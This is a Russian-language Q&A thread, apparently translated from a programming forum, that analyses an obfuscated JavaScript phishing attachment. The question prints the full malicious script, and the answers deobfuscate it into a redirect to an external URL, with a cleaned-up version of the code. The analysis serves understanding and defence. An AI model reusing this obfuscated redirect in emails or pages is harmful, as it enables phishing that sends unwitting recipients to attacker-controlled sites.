Что делает этот подозрительный код фишинга?

Question

Несколько моих коллег, не являющихся ИТ-специалистами, открыли вложение в .html в сообщении электронной почты, которое выглядит крайне подозрительно. Это привело к появлению пустого экрана, когда оказалось, что какой-то код JavaScript был запущен.

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

Что это сделало? Это выходит за рамки моих знаний в области программирования.

Answer 1

Он будет перенаправлен на URL 'http://lendermedia.com/images/z.htm' (следуйте на свой страх и риск).

Скопируйте и вставьте код в достойный редактор JavaScript и отформатируйте его для вас.

Ключевые моменты:

var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');

h будет равно 'http://lendermedia.com/images/z.htm'

t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];

t будет содержать ссылку на document.location

b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;

Свойство с именем href из b, которое на данный момент (внутри другой функции) действительно равно t из вышеприведенного оператора, имеет значение h, которое является URL.

Большая часть кода - просто шум, реальная функциональность состоит из этого:

function uK() {
};
uK.prototype = {
  f : function() {
    var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'
        .replace(/[\^H\!9X]/g, '');
    t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
    function x(b) {
      b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;
    }
    x(t);
  }
};
var tL = new uK();
tL.f();

Answer 2

Я столкнулся с той же проблемой, а затем нашел эту страницу. После выполнения WHOIS для контактной информации, я связался с владельцем lendermedia.com, который, похоже, только что узнал, что на его сайте размещена страница z.htm без его ведома и вопреки его желаниям. Когда я связался с ним, я смог просмотреть его каталог /images/. С тех пор он изменил разрешения. Все это говорит о том, что этот парень выглядит чистым, но решать вам.

Answer 3

Ключевая часть, чтобы понять , что код является replace(/[\^H\!9X]/g, '') частями. если второй аргумент для замены - '', то он просто удаляет материал из предыдущей строки.

Действительно неумелый способ запутать вещи. Вероятно, цель состоит в том, чтобы быть случайным для каждого пользователя и избегать байесовских фильтров спама.

Answer 4

Минус запутывание, что-то вроде document.location.href="http://lendermedia.com/images/z.htm"